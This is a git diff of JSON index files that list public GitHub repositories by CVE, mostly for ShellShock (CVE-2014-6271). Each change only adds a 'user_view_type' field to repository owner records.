+38,8 @@ "login": "davidmurray", "id": 545502, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/545502?v=4", - "html_url": "https:\/\/github.com\/davidmurray" + "html_url": "https:\/\/github.com\/davidmurray", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/davidmurray\/CVE-2014-4377", "description": "CydiaSubstrate-based fix for CVE-2014-4377.", diff --git a/2014/CVE-2014-4378.json b/2014/CVE-2014-4378.json index 2c55b9cae8..3240470cd1 100644 --- a/2014/CVE-2014-4378.json +++ b/2014/CVE-2014-4378.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4378", "description": null, diff --git a/2014/CVE-2014-4481.json b/2014/CVE-2014-4481.json index 2ebbe82725..533686de4d 100644 --- a/2014/CVE-2014-4481.json +++ b/2014/CVE-2014-4481.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4481", "description": "Apple CoreGraphics framework fails to validate the input when parsing CCITT group 3 encoded data resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input resulting in arbitrary code execution in the context of Mobile Safari.", diff --git a/2014/CVE-2014-4511.json b/2014/CVE-2014-4511.json index 1ca873c4b0..71bfce899f 100644 --- a/2014/CVE-2014-4511.json +++ b/2014/CVE-2014-4511.json @@ -7,7 +7,8 @@ "login": "michaelsss1", "id": 22094885, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22094885?v=4", - "html_url": "https:\/\/github.com\/michaelsss1" + "html_url": "https:\/\/github.com\/michaelsss1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/michaelsss1\/gitlist-RCE", "description": "CVE-2014-4511", diff --git a/2014/CVE-2014-4671.json b/2014/CVE-2014-4671.json index 81fb37e9f1..02cd3835a9 100644 --- a/2014/CVE-2014-4671.json +++ b/2014/CVE-2014-4671.json @@ -7,7 +7,8 @@ "login": "cph", "id": 1691248, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1691248?v=4", - "html_url": "https:\/\/github.com\/cph" + "html_url": "https:\/\/github.com\/cph", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cph\/rabl-old", "description": "rabl 0.8.6 + fix for CVE-2014-4671", diff --git a/2014/CVE-2014-4688.json b/2014/CVE-2014-4688.json index ef4c3667ee..49393d73fa 100644 --- a/2014/CVE-2014-4688.json +++ b/2014/CVE-2014-4688.json @@ -7,7 +7,8 @@ "login": "andyfeili", "id": 59521017, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59521017?v=4", - "html_url": "https:\/\/github.com\/andyfeili" + "html_url": "https:\/\/github.com\/andyfeili", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/andyfeili\/CVE-2014-4688", "description": null, diff --git a/2014/CVE-2014-4699.json b/2014/CVE-2014-4699.json index f716503511..d41750044a 100644 --- a/2014/CVE-2014-4699.json +++ b/2014/CVE-2014-4699.json @@ -7,7 +7,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/cve-2014-4699-ptrace", "description": "My old sysret \/ ptrace PoC", diff --git a/2014/CVE-2014-4936.json b/2014/CVE-2014-4936.json index 3b2157487c..36256ce415 100644 --- a/2014/CVE-2014-4936.json +++ b/2014/CVE-2014-4936.json @@ -7,7 +7,8 @@ "login": "0x3a", "id": 7872766, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7872766?v=4", - "html_url": "https:\/\/github.com\/0x3a" + "html_url": "https:\/\/github.com\/0x3a", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x3a\/CVE-2014-4936", "description": "Repository for CVE-2014-4936 POC code.", diff --git a/2014/CVE-2014-4943.json b/2014/CVE-2014-4943.json index 28062ab43f..e51bbf1946 100644 --- a/2014/CVE-2014-4943.json +++ b/2014/CVE-2014-4943.json @@ -7,7 +7,8 @@ "login": "redes-2015", "id": 15361031, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15361031?v=4", - "html_url": "https:\/\/github.com\/redes-2015" + "html_url": "https:\/\/github.com\/redes-2015", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redes-2015\/l2tp-socket-bug", "description": "Estudo e apresentação do bug CVE-2014-4943 para a disciplina MAC0448", diff --git a/2014/CVE-2014-5139.json b/2014/CVE-2014-5139.json index 52c46c7e72..763f1d95a8 100644 --- a/2014/CVE-2014-5139.json +++ b/2014/CVE-2014-5139.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-5139", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/G2.5_openssl_CVE-2014-5139", "description": null, diff --git a/2014/CVE-2014-5284.json b/2014/CVE-2014-5284.json index 425b02975e..993dc847b6 100644 --- a/2014/CVE-2014-5284.json +++ b/2014/CVE-2014-5284.json @@ -7,7 +7,8 @@ "login": "mbadanoiu", "id": 18383407, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", - "html_url": "https:\/\/github.com\/mbadanoiu" + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2014-5284", "description": "Bash implementation of CVE-2014-5284", diff --git a/2014/CVE-2014-5460.json b/2014/CVE-2014-5460.json index 8aed8d349a..f6082fe671 100644 --- a/2014/CVE-2014-5460.json +++ b/2014/CVE-2014-5460.json @@ -7,7 +7,8 @@ "login": "brookeses69", "id": 83194919, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83194919?v=4", - "html_url": "https:\/\/github.com\/brookeses69" + "html_url": "https:\/\/github.com\/brookeses69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/brookeses69\/CVE-2014-5460", "description": "CVE-2014-5460", diff --git a/2014/CVE-2014-6271.json b/2014/CVE-2014-6271.json index c20469c78c..eb327453e9 100644 --- a/2014/CVE-2014-6271.json +++ b/2014/CVE-2014-6271.json @@ -7,7 +7,8 @@ "login": "dlitz", "id": 99377, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99377?v=4", - "html_url": "https:\/\/github.com\/dlitz" + "html_url": "https:\/\/github.com\/dlitz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dlitz\/bash-cve-2014-6271-fixes", "description": "Collected fixes for bash CVE-2014-6271", @@ -37,7 +38,8 @@ "login": "npm", "id": 6078720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6078720?v=4", - "html_url": "https:\/\/github.com\/npm" + "html_url": "https:\/\/github.com\/npm", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/npm\/ansible-bashpocalypse", "description": "Patch for CVE-2014-6271", @@ -67,7 +69,8 @@ "login": "ryancnelson", "id": 347171, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/347171?v=4", - "html_url": "https:\/\/github.com\/ryancnelson" + "html_url": "https:\/\/github.com\/ryancnelson", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ryancnelson\/patched-bash-4.3", "description": "patched-bash-4.3 for CVE-2014-6271", @@ -97,7 +100,8 @@ "login": "jblaine", "id": 438740, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/438740?v=4", - "html_url": "https:\/\/github.com\/jblaine" + "html_url": "https:\/\/github.com\/jblaine", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jblaine\/cookbook-bash-CVE-2014-6271", "description": "Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271", @@ -127,7 +131,8 @@ "login": "rrreeeyyy", "id": 2457736, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2457736?v=4", - "html_url": "https:\/\/github.com\/rrreeeyyy" + "html_url": "https:\/\/github.com\/rrreeeyyy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rrreeeyyy\/cve-2014-6271-spec", "description": null, @@ -157,7 +162,8 @@ "login": "scottjpack", "id": 2293674, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2293674?v=4", - "html_url": "https:\/\/github.com\/scottjpack" + "html_url": "https:\/\/github.com\/scottjpack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/scottjpack\/shellshock_scanner", "description": "Python Scanner for \"ShellShock\" (CVE-2014-6271)", @@ -187,7 +193,8 @@ "login": "Anklebiter87", "id": 6879102, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6879102?v=4", - "html_url": "https:\/\/github.com\/Anklebiter87" + "html_url": "https:\/\/github.com\/Anklebiter87", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Anklebiter87\/Cgi-bin_bash_Reverse", "description": "Written fro CVE-2014-6271", @@ -217,7 +224,8 @@ "login": "justzx2011", "id": 1185865, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1185865?v=4", - "html_url": "https:\/\/github.com\/justzx2011" + "html_url": "https:\/\/github.com\/justzx2011", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/justzx2011\/bash-up", "description": "a auto script to fix CVE-2014-6271 bash vulnerability", @@ -247,7 +255,8 @@ "login": "mattclegg", "id": 303487, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/303487?v=4", - "html_url": "https:\/\/github.com\/mattclegg" + "html_url": "https:\/\/github.com\/mattclegg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mattclegg\/CVE-2014-6271", "description": null, @@ -277,7 +286,8 @@ "login": "ilismal", "id": 5867683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5867683?v=4", - "html_url": "https:\/\/github.com\/ilismal" + "html_url": "https:\/\/github.com\/ilismal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ilismal\/Nessus_CVE-2014-6271_check", "description": "Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271", @@ -307,7 +317,8 @@ "login": "RainMak3r", "id": 3872733, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3872733?v=4", - "html_url": "https:\/\/github.com\/RainMak3r" + "html_url": "https:\/\/github.com\/RainMak3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RainMak3r\/Rainstorm", "description": "CVE-2014-6271 RCE tool ", @@ -337,7 +348,8 @@ "login": "gabemarshall", "id": 2541585, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2541585?v=4", - "html_url": "https:\/\/github.com\/gabemarshall" + "html_url": "https:\/\/github.com\/gabemarshall", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gabemarshall\/shocknaww", "description": "Simple script to check for CVE-2014-6271", @@ -367,7 +379,8 @@ "login": "woltage", "id": 250504, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/250504?v=4", - "html_url": "https:\/\/github.com\/woltage" + "html_url": "https:\/\/github.com\/woltage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/woltage\/CVE-2014-6271", "description": null, @@ -397,7 +410,8 @@ "login": "ariarijp", "id": 635649, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/635649?v=4", - "html_url": "https:\/\/github.com\/ariarijp" + "html_url": "https:\/\/github.com\/ariarijp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ariarijp\/vagrant-shellshock", "description": "CVE-2014-6271の検証用Vagrantfileです", @@ -427,7 +441,8 @@ "login": "themson", "id": 6145047, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6145047?v=4", - "html_url": "https:\/\/github.com\/themson" + "html_url": "https:\/\/github.com\/themson", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/themson\/shellshock", "description": "scripts associate with bourne shell EVN function parsing vulnerability CVE-2014-6271", @@ -457,7 +472,8 @@ "login": "securusglobal", "id": 709629, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/709629?v=4", - "html_url": "https:\/\/github.com\/securusglobal" + "html_url": "https:\/\/github.com\/securusglobal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/securusglobal\/BadBash", "description": "CVE-2014-6271 (ShellShock) RCE PoC tool ", @@ -487,7 +503,8 @@ "login": "villadora", "id": 724998, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/724998?v=4", - "html_url": "https:\/\/github.com\/villadora" + "html_url": "https:\/\/github.com\/villadora", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/villadora\/CVE-2014-6271", "description": "scaner for cve-2014-6271", @@ -517,7 +534,8 @@ "login": "APSL", "id": 469968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/469968?v=4", - "html_url": "https:\/\/github.com\/APSL" + "html_url": "https:\/\/github.com\/APSL", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/APSL\/salt-shellshock", "description": "Salt recipe for shellshock (CVE-2014-6271)", @@ -547,7 +565,8 @@ "login": "teedeedubya", "id": 6623145, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6623145?v=4", - "html_url": "https:\/\/github.com\/teedeedubya" + "html_url": "https:\/\/github.com\/teedeedubya", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/teedeedubya\/bash-fix-exploit", "description": "Ansible role to check the CVE-2014-6271 vulnerability", @@ -577,7 +596,8 @@ "login": "internero", "id": 553577, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/553577?v=4", - "html_url": "https:\/\/github.com\/internero" + "html_url": "https:\/\/github.com\/internero", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/internero\/debian-lenny-bash_3.2.52-cve-2014-6271", "description": "Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)", @@ -607,7 +627,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-3.2-fixed-CVE-2014-6271", "description": null, @@ -637,7 +658,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-4.2-fixed-CVE-2014-6271", "description": null, @@ -667,7 +689,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-4.3-fixed-CVE-2014-6271", "description": null, @@ -697,7 +720,8 @@ "login": "francisck", "id": 8943367, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8943367?v=4", - "html_url": "https:\/\/github.com\/francisck" + "html_url": "https:\/\/github.com\/francisck", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/francisck\/shellshock-cgi", "description": "A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server", @@ -727,7 +751,8 @@ "login": "proclnas", "id": 3154242, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3154242?v=4", - "html_url": "https:\/\/github.com\/proclnas" + "html_url": "https:\/\/github.com\/proclnas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/proclnas\/ShellShock-CGI-Scan", "description": "A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)", @@ -757,7 +782,8 @@ "login": "sch3m4", "id": 607081, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/607081?v=4", - "html_url": "https:\/\/github.com\/sch3m4" + "html_url": "https:\/\/github.com\/sch3m4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sch3m4\/RIS", "description": "CVE-2014-6271 Remote Interactive Shell - PoC Exploit", @@ -787,7 +813,8 @@ "login": "ryeyao", "id": 1586403, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1586403?v=4", - "html_url": "https:\/\/github.com\/ryeyao" + "html_url": "https:\/\/github.com\/ryeyao", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ryeyao\/CVE-2014-6271_Test", "description": null, @@ -817,7 +844,8 @@ "login": "cj1324", "id": 489649, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/489649?v=4", - "html_url": "https:\/\/github.com\/cj1324" + "html_url": "https:\/\/github.com\/cj1324", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cj1324\/CGIShell", "description": "shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI", @@ -847,7 +875,8 @@ "login": "renanvicente", "id": 5564668, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5564668?v=4", - "html_url": "https:\/\/github.com\/renanvicente" + "html_url": "https:\/\/github.com\/renanvicente", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/renanvicente\/puppet-shellshock", "description": "This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible", @@ -877,7 +906,8 @@ "login": "indiandragon", "id": 1708856, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1708856?v=4", - "html_url": "https:\/\/github.com\/indiandragon" + "html_url": "https:\/\/github.com\/indiandragon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/indiandragon\/Shellshock-Vulnerability-Scan", "description": "Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock", @@ -907,7 +937,8 @@ "login": "ramnes", "id": 835072, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/835072?v=4", - "html_url": "https:\/\/github.com\/ramnes" + "html_url": "https:\/\/github.com\/ramnes", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ramnes\/pyshellshock", "description": ":scream: Python library and utility for CVE-2014-6271 (aka. \"shellshock\")", @@ -942,7 +973,8 @@ "login": "akiraaisha", "id": 6212018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6212018?v=4", - "html_url": "https:\/\/github.com\/akiraaisha" + "html_url": "https:\/\/github.com\/akiraaisha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akiraaisha\/shellshocker-python", "description": "This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271", @@ -972,7 +1004,8 @@ "login": "352926", "id": 2149434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2149434?v=4", - "html_url": "https:\/\/github.com\/352926" + "html_url": "https:\/\/github.com\/352926", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/352926\/shellshock_crawler", "description": "Using google to scan sites for \"ShellShock\" (CVE-2014-6271)", @@ -1002,7 +1035,8 @@ "login": "kelleykong", "id": 6037450, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6037450?v=4", - "html_url": "https:\/\/github.com\/kelleykong" + "html_url": "https:\/\/github.com\/kelleykong", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kelleykong\/cve-2014-6271-mengjia-kong", "description": "system reading course", @@ -1032,7 +1066,8 @@ "login": "huanlu", "id": 7565089, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7565089?v=4", - "html_url": "https:\/\/github.com\/huanlu" + "html_url": "https:\/\/github.com\/huanlu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/huanlu\/cve-2014-6271-huan-lu", "description": "reading course", @@ -1062,7 +1097,8 @@ "login": "sunnyjiang", "id": 3793477, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3793477?v=4", - "html_url": "https:\/\/github.com\/sunnyjiang" + "html_url": "https:\/\/github.com\/sunnyjiang", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sunnyjiang\/shellshocker-android", "description": "This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271", @@ -1092,7 +1128,8 @@ "login": "P0cL4bs", "id": 8557864, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8557864?v=4", - "html_url": "https:\/\/github.com\/P0cL4bs" + "html_url": "https:\/\/github.com\/P0cL4bs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/P0cL4bs\/ShellShock-CGI-Scan", "description": "A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug).", @@ -1122,7 +1159,8 @@ "login": "hmlio", "id": 11684719, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4", - "html_url": "https:\/\/github.com\/hmlio" + "html_url": "https:\/\/github.com\/hmlio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-6271", "description": "Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock", @@ -1152,7 +1190,8 @@ "login": "opsxcq", "id": 16995025, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16995025?v=4", - "html_url": "https:\/\/github.com\/opsxcq" + "html_url": "https:\/\/github.com\/opsxcq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/opsxcq\/exploit-CVE-2014-6271", "description": "Shellshock exploit + vulnerable environment", @@ -1189,7 +1228,8 @@ "login": "Pilou-Pilou", "id": 6388024, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6388024?v=4", - "html_url": "https:\/\/github.com\/Pilou-Pilou" + "html_url": "https:\/\/github.com\/Pilou-Pilou", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pilou-Pilou\/docker_CVE-2014-6271.", "description": null, @@ -1219,7 +1259,8 @@ "login": "zalalov", "id": 15165282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15165282?v=4", - "html_url": "https:\/\/github.com\/zalalov" + "html_url": "https:\/\/github.com\/zalalov", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zalalov\/CVE-2014-6271", "description": "Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell", @@ -1249,7 +1290,8 @@ "login": "heikipikker", "id": 16557916, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16557916?v=4", - "html_url": "https:\/\/github.com\/heikipikker" + "html_url": "https:\/\/github.com\/heikipikker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heikipikker\/shellshock-shell", "description": "A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug.", @@ -1279,7 +1321,8 @@ "login": "0x00-0x00", "id": 23364530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", - "html_url": "https:\/\/github.com\/0x00-0x00" + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2014-6271", "description": "Shellshock exploitation script that is able to upload and RCE using any vector due to its versatility.", @@ -1309,7 +1352,8 @@ "login": "kowshik-sundararajan", "id": 14358565, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14358565?v=4", - "html_url": "https:\/\/github.com\/kowshik-sundararajan" + "html_url": "https:\/\/github.com\/kowshik-sundararajan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kowshik-sundararajan\/CVE-2014-6271", "description": "CS4238 Computer Security Practices", @@ -1339,7 +1383,8 @@ "login": "w4fz5uck5", "id": 32375656, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", - "html_url": "https:\/\/github.com\/w4fz5uck5" + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/w4fz5uck5\/ShockZaum-CVE-2014-6271", "description": "Shellshock vulnerability attacker", @@ -1369,7 +1414,8 @@ "login": "Aruthw", "id": 38236012, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38236012?v=4", - "html_url": "https:\/\/github.com\/Aruthw" + "html_url": "https:\/\/github.com\/Aruthw", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Aruthw\/CVE-2014-6271", "description": null, @@ -1399,7 +1445,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-6271", "description": "cve-2014-6271", @@ -1429,7 +1476,8 @@ "login": "shawntns", "id": 22453528, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22453528?v=4", - "html_url": "https:\/\/github.com\/shawntns" + "html_url": "https:\/\/github.com\/shawntns", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shawntns\/exploit-CVE-2014-6271", "description": null, @@ -1459,7 +1507,8 @@ "login": "Sindadziy", "id": 55396899, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55396899?v=4", - "html_url": "https:\/\/github.com\/Sindadziy" + "html_url": "https:\/\/github.com\/Sindadziy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sindadziy\/cve-2014-6271", "description": null, @@ -1489,7 +1538,8 @@ "login": "wenyu1999", "id": 55389198, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55389198?v=4", - "html_url": "https:\/\/github.com\/wenyu1999" + "html_url": "https:\/\/github.com\/wenyu1999", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wenyu1999\/bash-shellshock", "description": "cve-2014-6271", @@ -1519,7 +1569,8 @@ "login": "Sindayifu", "id": 55397670, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55397670?v=4", - "html_url": "https:\/\/github.com\/Sindayifu" + "html_url": "https:\/\/github.com\/Sindayifu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sindayifu\/CVE-2019-14287-CVE-2014-6271", "description": null, @@ -1549,7 +1600,8 @@ "login": "Any3ite", "id": 20638313, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4", - "html_url": "https:\/\/github.com\/Any3ite" + "html_url": "https:\/\/github.com\/Any3ite", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Any3ite\/CVE-2014-6271", "description": null, @@ -1579,7 +1631,8 @@ "login": "somhm-solutions", "id": 56839517, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56839517?v=4", - "html_url": "https:\/\/github.com\/somhm-solutions" + "html_url": "https:\/\/github.com\/somhm-solutions", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/somhm-solutions\/Shell-Shock", "description": "*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability\/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---", @@ -1609,7 +1662,8 @@ "login": "rashmikadileeshara", "id": 63233037, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63233037?v=4", - "html_url": "https:\/\/github.com\/rashmikadileeshara" + "html_url": "https:\/\/github.com\/rashmikadileeshara", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rashmikadileeshara\/CVE-2014-6271-Shellshock-", "description": "This is an individual assignment for secure network programming", @@ -1639,7 +1693,8 @@ "login": "Dilith006", "id": 53945641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53945641?v=4", - "html_url": "https:\/\/github.com\/Dilith006" + "html_url": "https:\/\/github.com\/Dilith006", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Dilith006\/CVE-2014-6271", "description": null, @@ -1669,7 +1724,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Shellbash-CVE-2014-6271", "description": null, @@ -1699,7 +1755,8 @@ "login": "MuirlandOracle", "id": 58998623, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58998623?v=4", - "html_url": "https:\/\/github.com\/MuirlandOracle" + "html_url": "https:\/\/github.com\/MuirlandOracle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MuirlandOracle\/CVE-2014-6271-IPFire", "description": null, @@ -1729,7 +1786,8 @@ "login": "mochizuki875", "id": 37737691, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37737691?v=4", - "html_url": "https:\/\/github.com\/mochizuki875" + "html_url": "https:\/\/github.com\/mochizuki875", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mochizuki875\/CVE-2014-6271-Apache-Debian", "description": "This Repo is PoC environment of CVE-2014-6271(https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2014-6271).", @@ -1759,7 +1817,8 @@ "login": "b4keSn4ke", "id": 44183775, "avatar_url": 